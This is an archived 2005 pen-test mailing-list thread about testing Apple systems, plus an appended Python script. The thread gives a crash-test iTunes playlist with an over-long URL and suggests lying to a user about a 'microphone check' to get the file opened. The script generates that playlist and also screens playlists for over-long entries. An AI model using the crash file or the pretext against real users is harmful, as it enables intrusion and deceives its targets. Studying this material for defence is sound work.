
| Subject: | Re: Apple pentesting |
|---|---|
| Date: | Wed, 6 Apr 2005 00:35:49 +0100 |
I'll answer your questions individually. First thing to understand is that not all vulnerabilities have a corresponding "publicly available" exploit; yes, the 0-day still exists.

<<Where is the exploit information?>>

As I said before, not all known vulnerabilities have publicly available exploit code. I'd suggest getting kinky with Metasploit or a subscription to Canvas/that other one I can't think of right now. If they are publicly available, those crazy French peeps over at k-otik may have it (http://www.frsirt.com/english/).

<<What is the vulnerability?>>

If you're on the pen-test mailing list, I'm gathering you're a sexurity conslutant and have some idea of where security vulnerabilities are announced; if not, Google/securityfocus.com/apple.com/security and the full-disclosure mailing list.

<<Do exploits exist?>>

Oh yes, they do, and don't let some vendor tell you otherwise.

<<Can you test if you are vulnerable?>>

This is the main issue currently splitting the security consultancy industry in half at the moment. On the one hand you have people who call themselves "pen-testers" but are only able to rely on automated tools and scripts to test (and therefore should be known as vulnerability assessment consultants), and then you have consultants who are able to read a vulnerability statement and have an understanding of how to look for the issue and perform a test.

Here, very roughly, is how you could test: find a vulnerability that you know you have the skill set to test for. Hmmm, in this case I'll pick the iTunes issue found by those lovely people at iDefense: http://www.idefense.com/application/poi/display?id=180&type=vulnerabilities

* I'm using this one as an example; yes, you need the person to click and listen to the playlist, but hell, social engineering is all part of the game, so apologies to all that it's not a 100% remote issue. *

So the issue is that iTunes gets its knickers in a knot when parsing playlist files which may contain really long URL file entries. Well, this is a simple classic issue here, well documented, and armed with your copy of The Shellcoder's Handbook, easy to create a test for:

```
[playlist]
numberofentries=1
File1=http://[P x 3333] 2233
Length1=-1
Version=2
```

Save that file and somehow get a person on the box to open it (pretty easy: tell them you're doing a test for the IT department and this is to check to see if the microphone is enabled, as if it is, a virus could record all office noise). iTunes will crash, and if you took steps to actually exploit this crash, you may end up with code being executed.

<<Apple doesn't follow Full-Disclosure>>

And I'm 1000% supportive of this process, as is Microsoft/Oracle/Sun/Sybase etc. Why should they report detailed information about the security hole? They list the issue and also if it was fixed and how to go about fixing it using a supplied patch or method.

Here's hoping all the questions raised have been answered?

Daniel

On Apr 5, 2005 7:59 PM, Todd Towles <toddtowles@brookshires.com> wrote:

And I ask you, where is the exploit information? What is the vulnerability? Do exploits exist? Can you test if you are vulnerable? There is a site that lists patches... not the same thing. Interesting that you think they are the same. Apple doesn't follow Full-Disclosure, that was my point. I didn't mean they don't patch...

-----Original Message-----
From: Altheide, Cory B. (IARC) [mailto:AltheideC@nv.doe.gov]
Sent: Tuesday, April 05, 2005 1:55 PM
To: Todd Towles; Julian Totzek; pen-test@securityfocus.com
Subject: RE: Apple pentesting

-----Original Message-----
From: Todd Towles [mailto:toddtowles@brookshires.com]
Sent: Tuesday, April 05, 2005 10:48 AM
To: Julian Totzek; pen-test@securityfocus.com
Subject: RE: Apple pentesting

Nessus does work against Macs; the problem with testing Macs is they never released vulnerability statements... never. If a hole is found, Apple releases a patch and no one says anything. If Microsoft did this... everyone would go crazy.

I'm gonna go out on a limb and say you don't know what you're talking about. Protip: Google for 'apple security' and this is the first hit. http://docs.info.apple.com/article.html?artnum=61798

Cory Altheide
Senior Network Forensics Specialist
NNSA Information Assurance Response Center (IARC)
altheidec@nv.doe.gov
"I have taken all knowledge to be my province." -- Francis Bacon
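Daniel's test case above is a hand-written .pls file with a 3333-byte URL in its File1 entry. The following is an added example, not code from the thread: it generates that playlist from a length parameter (so the crash-or-no-crash boundary can be bisected instead of guessed), and pairs it with a small .pls parser that flags over-long File entries, which is the check you would run on an incoming playlist before anyone double-clicks it. The filler character `P` and the length 3333 are taken from the post; the 1024-byte `limit` used by the checker is an assumed threshold for illustration, not a figure from the iDefense advisory.

```python
"""Added example: build and screen over-long-URL .pls playlists.

Not code from the pen-test thread or from iDefense. The 'P' filler and the
3333 length come from Daniel's hand-written test file; the limit used by the
checker below is an assumption chosen for illustration.
"""

FILLER = "P"
POST_URL_LEN = 3333  # the [P x 3333] from the post


def build_pls(url_len: int = POST_URL_LEN, filler: str = FILLER,
              length: int = -1) -> str:
    """Return a single-entry .pls playlist whose File1 URL carries
    url_len bytes of filler after the 'http://' scheme prefix."""
    url = "http://" + filler * url_len
    lines = [
        "[playlist]",
        "numberofentries=1",
        f"File1={url}",
        f"Length1={length}",
        "Version=2",
    ]
    return "\n".join(lines) + "\n"


def parse_pls(text: str) -> dict:
    """Minimal .pls parser: {key: value} for the [playlist] section.

    Blank lines and ';' or '#' comments are skipped, keys are lower-cased
    and section names are compared case-insensitively, so 'File1' and
    'file1' land on the same key."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "playlist"
            continue
        if not in_section or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries[key.strip().lower()] = value.strip()
    return entries


def overlong_file_entries(text: str, limit: int) -> list:
    """Return [(key, length)] for every FileN value longer than limit bytes.

    Every FileN key is inspected, not just the first numberofentries of
    them, because a hostile file can lie about its own entry count."""
    hits = []
    for key, value in parse_pls(text).items():
        if key.startswith("file") and key[4:].isdigit() and len(value) > limit:
            hits.append((key, len(value)))
    return hits


def write_test_playlist(path: str, url_len: int = POST_URL_LEN) -> str:
    """Write the crash-test playlist to disk and return the path."""
    with open(path, "w", encoding="ascii", newline="\n") as fh:
        fh.write(build_pls(url_len))
    return path


if __name__ == "__main__":
    pls = build_pls()
    print(pls[:60] + "...")
    # A 1024-byte limit is an assumed screening threshold, not the real one.
    print(overlong_file_entries(pls, limit=1024))
```

To bisect the crash length, call `write_test_playlist("test.pls", n)` for decreasing `n` and open each file in the target iTunes build; to screen a playlist someone sent you, run `overlong_file_entries` over its contents and treat any hit as a file not to open on a production box.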